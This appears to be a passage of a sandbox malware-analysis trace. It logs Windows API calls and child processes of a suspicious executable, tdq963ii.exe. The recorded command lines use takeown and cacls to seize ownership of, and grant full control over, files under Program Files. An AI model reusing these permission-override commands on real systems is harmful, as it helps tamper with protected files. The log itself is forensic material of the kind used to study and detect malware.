| out: lpLCData="1") returned 2 [0214.749] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0214.749] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0214.749] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0214.749] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0214.749] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0214.749] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0214.749] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0214.750] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0214.750] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0214.750] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0214.750] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0214.751] GetProcessHeap () returned 0x4c0000 [0214.751] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x20c) returned 0x4d21e0 [0214.751] GetConsoleTitleW (in: lpConsoleTitle=0x4d21e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.751] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0214.751] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0214.752] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0214.752] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0214.753] GetProcessHeap () returned 0x4c0000 [0214.753] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x400a) returned 0x4d4f08 [0214.753] GetProcessHeap () returned 0x4c0000 [0214.753] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d4f08 | out: hHeap=0x4c0000) returned 1 [0214.755] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0214.755] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0214.755] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0214.755] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0214.755] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0214.755] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0214.755] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0214.755] GetProcessHeap () returned 0x4c0000 [0214.755] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x58) returned 0x4d46a8 [0214.755] GetProcessHeap () returned 0x4c0000 [0214.755] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x22) returned 0x4d23f8 [0214.758] GetProcessHeap () returned 0x4c0000 [0214.758] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x56) returned 0x4d2428 [0214.759] GetConsoleTitleW (in: lpConsoleTitle=0x43f4d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.760] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0214.760] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0214.761] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0214.762] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0214.763] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0214.763] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0214.763] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0214.763] GetProcessHeap () returned 0x4c0000 [0214.763] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x210) returned 0x4d2488 [0214.763] GetProcessHeap () returned 0x4c0000 [0214.763] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x70) returned 0x4d26a0 [0214.763] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0214.764] GetProcessHeap () returned 0x4c0000 [0214.764] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x418) returned 0x4d2718 [0214.764] SetErrorMode (uMode=0x0) returned 0x0 [0214.764] SetErrorMode (uMode=0x1) returned 0x0 [0214.764] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4d2720, lpFilePart=0x43eff8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x43eff8*="Desktop") returned 0x25 [0214.764] SetErrorMode (uMode=0x0) returned 0x1 [0214.764] GetProcessHeap () returned 0x4c0000 [0214.764] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4d2718, Size=0x6e) returned 0x4d2718 [0214.764] GetProcessHeap () returned 0x4c0000 [0214.764] RtlSizeHeap (HeapHandle=0x4c0000, Flags=0x0, MemoryPointer=0x4d2718) returned 0x6e [0214.764] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0214.764] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.764] GetProcessHeap () returned 0x4c0000 [0214.764] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x120) returned 0x4d2790 [0214.764] GetProcessHeap () returned 0x4c0000 [0214.764] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x238) returned 0x4d28b8 [0214.774] GetConsoleTitleW (in: lpConsoleTitle=0x43f26c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.038] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f0f4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f1bc | out: lpAttributeList=0x43f0f4, lpSize=0x43f1bc) returned 1 [0215.038] UpdateProcThreadAttribute (in: lpAttributeList=0x43f0f4, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f1b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f0f4, lpPreviousValue=0x0) returned 1 [0215.038] GetStartupInfoW (in: lpStartupInfo=0x43f0b0 | out: lpStartupInfo=0x43f0b0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0215.423] CloseHandle (hObject=0x74) returned 1 [0215.423] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0215.423] GetProcessHeap () returned 0x4c0000 [0215.423] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d2d70 | out: hHeap=0x4c0000) returned 1 [0215.423] GetEnvironmentStringsW () returned 0x4d2d08* [0215.424] GetProcessHeap () returned 0x4c0000 [0215.424] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xb82) returned 0x4daf20 [0215.424] FreeEnvironmentStringsW (penv=0x4d2d08) returned 1 [0215.424] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) Process: id = "214" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x2b82f000" os_pid = "0x708" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "201" os_parent_pid = "0x7d8" cmd_line = "cacls \"C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 786 os_tid = 0xa48 Process: id = "215" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x2b023000" os_pid = "0xb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "179" os_parent_pid = "0x74c" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\Journal.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 787 os_tid = 0x72c Thread: id = 794 os_tid = 0xb68 Process: id = "216" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x2b07e000" os_pid = "0x490" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "163" os_parent_pid = "0xa18" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 788 os_tid = 0xa8c [0218.758] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0218.759] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0218.759] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0218.759] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0218.759] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0218.759] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0218.759] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0218.760] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0218.760] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0218.760] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0218.760] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0218.760] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0218.761] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0218.761] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0218.761] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0218.761] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0218.761] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0218.761] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0218.762] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0218.762] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0218.762] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0218.762] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0218.762] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0218.763] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0218.763] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0218.763] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0218.763] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0218.763] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0218.763] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0218.763] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0218.763] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0218.763] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0218.764] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0218.764] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0218.764] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0218.764] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0218.764] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0218.764] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0218.764] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0218.764] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0218.765] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0218.765] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0218.765] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0218.765] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0218.765] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0218.765] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0218.765] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0218.765] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0218.766] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0218.766] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0218.766] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0218.766] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0218.766] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0218.766] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0218.766] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0218.766] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0218.766] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0218.766] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0218.767] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0218.767] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0218.767] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0218.767] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0218.767] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0218.767] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0218.767] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0218.767] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0218.767] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0218.768] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0218.768] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0218.768] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0218.768] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0218.768] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0218.768] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0218.768] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0218.768] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0218.769] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0218.769] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0218.769] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0218.769] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0218.769] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0218.769] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0218.769] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0218.769] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0218.770] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0218.770] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0218.770] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0218.770] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0218.770] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0218.770] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0218.770] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0218.770] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0218.770] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0218.771] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0218.771] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0218.771] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0218.771] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0218.771] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0218.771] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0218.771] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0218.771] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0218.771] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0218.771] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0218.772] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0218.772] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0218.772] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0218.772] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0218.883] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0218.884] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0218.884] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0218.884] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0218.884] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0218.884] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0218.884] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0218.884] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0218.884] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0218.885] 